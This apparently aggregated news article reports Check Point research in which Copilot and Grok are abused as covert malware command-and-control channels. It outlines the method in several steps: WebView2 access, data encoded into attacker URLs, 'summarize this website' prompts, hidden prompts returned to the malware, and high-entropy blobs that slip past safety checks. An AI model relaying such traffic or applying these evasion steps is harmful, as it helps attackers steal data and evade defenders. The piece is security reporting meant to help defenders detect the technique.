AI assistants like Copilot and Grok can be exploited for covert malware command and control

3 Sources

Share

Cybersecurity researchers at Check Point discovered that AI assistants with web browsing capabilities can be abused as covert command-and-control channels. Threat actors can exploit Microsoft Copilot and Grok to relay malicious traffic disguised as legitimate AI queries, bypassing traditional security tools without requiring API keys or user accounts.

AI Assistants Become Unexpected Security Vulnerability

Cybersecurity researchers at Check Point have identified a troubling vulnerability in how AI assistants can be weaponized by threat actors. The research demonstrates that AI platforms with web browsing capabilities, specifically Microsoft Copilot and Grok from xAI, can be exploited as covert command-and-control channels for AI malware operations

1

. This discovery marks a shift from AI command and control being merely theoretical to a demonstrated proof-of-concept that expands the attack surface available to adversaries

3

.

Source: TechRadar

Source: TechRadar

The technique allows malicious software to communicate with attacker infrastructure without directly connecting to traditional command-and-control servers. Instead, AI malware interacts with AI assistants through legitimate-looking queries, instructing the agent to fetch attacker-controlled URLs and receive responses embedded in the AI's output

1

. This creates a bidirectional communication channel that security tools typically trust, enabling stealthy malware communication that evades detection.

How AI Platforms Abused for Malware Actually Works

Check Point's proof-of-concept demonstrates a sophisticated abuse mechanism. The researchers created a C++ program using Windows 11's WebView2 component to open interfaces pointing to either Grok or Microsoft Copilot

1

. Even if WebView2 is missing from a target system, threat actors can embed it within the malware itself, removing a potential barrier to exploitation.

The attack flow works through encoded data exchanges. Malware on an infected device can harvest sensitive information and system details, encode this data, and insert it into URLs controlled by attackers—for example, http://malicious-site.com/report?data=12345678

2

. The malware then instructs the AI assistant to "summarize the contents of this website." Since this appears as legitimate AI traffic, it doesn't trigger security alarms, yet the sensitive information gets logged on the attacker-controlled server

2

.

Source: BleepingComputer

Source: BleepingComputer

The webpage can respond with hidden prompts that the AI extracts or summarizes, which the malware parses to extract instructions. This enables data exfiltration and command delivery to bypass traditional security tools through what appears to be normal AI usage

1

.

Why Traditional Defenses Struggle Against This Technique

What makes exploiting AI web browsing capabilities particularly concerning is the absence of typical takedown mechanisms. Check Point explains that when attackers abuse legitimate services for command-and-control operations, defenders can usually block accounts, revoke API keys, or suspend tenants

1

. However, directly interacting with AI assistants through web pages eliminates these safeguards.

The proof-of-concept tested on Grok and Microsoft Copilot requires no API keys or authenticated user accounts, making traceability and infrastructure blocking significantly more difficult

1

. While AI platforms have safeguards to block obviously malicious exchanges, these safety checks can be circumvented by encrypting data into high-entropy blobs that appear innocuous

1

.

From a network perspective, malicious traffic blends with AI queries that enterprises increasingly consider trusted and normal. As Generative AI tools become widely adopted across organizations, their network traffic naturally blends into enterprise activity, making detection even more challenging

3

.

AI as Decision Engines: The Next Evolution

Beyond serving as a C2 proxy, the research points toward a more concerning development: AI-driven malware that uses AI assistants as decision engines. Check Point researchers warn that malware can query AI about operational choices, asking whether a compromised system runs in a high-value enterprise environment or a security sandbox

2

. Based on the AI's assessment, malware can remain dormant or proceed to more aggressive stages of attack.

This represents a shift from AI-assisted attacks to truly AI-driven malware. Instead of following fixed instruction sequences, malicious software can collect environmental information and rely on AI output to determine targeting priorities, operational intensity, and timing

3

. The result is adaptive malware that behaves less like a script and more like a human operator, making campaigns harder to predict and detect through traditional pattern recognition.

Check Point notes this mirrors trends in legitimate IT operations, where automation and AI-driven systems increasingly guide workflows. Applied to malicious operations, this translates into AIOps-style command and control that helps manage infections, prioritize targets, and optimize outcomes dynamically

3

.

What Organizations Should Watch For

While Check Point has not observed threat actors actively exploiting this technique in campaigns, the research demonstrates its feasibility and the expanding attack surface created by AI adoption

3

. The cybersecurity researchers disclosed their findings to both Microsoft and xAI, though immediate safeguards remain unclear

1

.

Experts emphasize that "AI assistants are no longer just productivity tools; they are becoming part of the infrastructure that malware can abuse"

2

. Organizations deploying AI assistants should monitor for unusual patterns in AI service usage, particularly repeated requests to fetch external URLs or interactions that follow scripted patterns rather than human behavior.

The technique's significance extends beyond a single abuse vector. Once AI services function as a stealthy transport layer, they can carry instructions, prompts, and decisions that enable malware to adapt across victims without code changes

3

. Security teams should prepare for a future where bypassing security through legitimate AI channels becomes a standard component of sophisticated attacks, requiring new detection methodologies that account for AI-mediated threats.

Today's Top Stories

TheOutpost.ai

Your Daily Dose of Curated AI News

Don’t drown in AI news. We cut through the noise - filtering, ranking and summarizing the most important AI news, breakthroughs and research daily. Spend less time searching for the latest in AI and get straight to action.

© 2026 Triveous Technologies Private Limited
Instagram logo
LinkedIn logo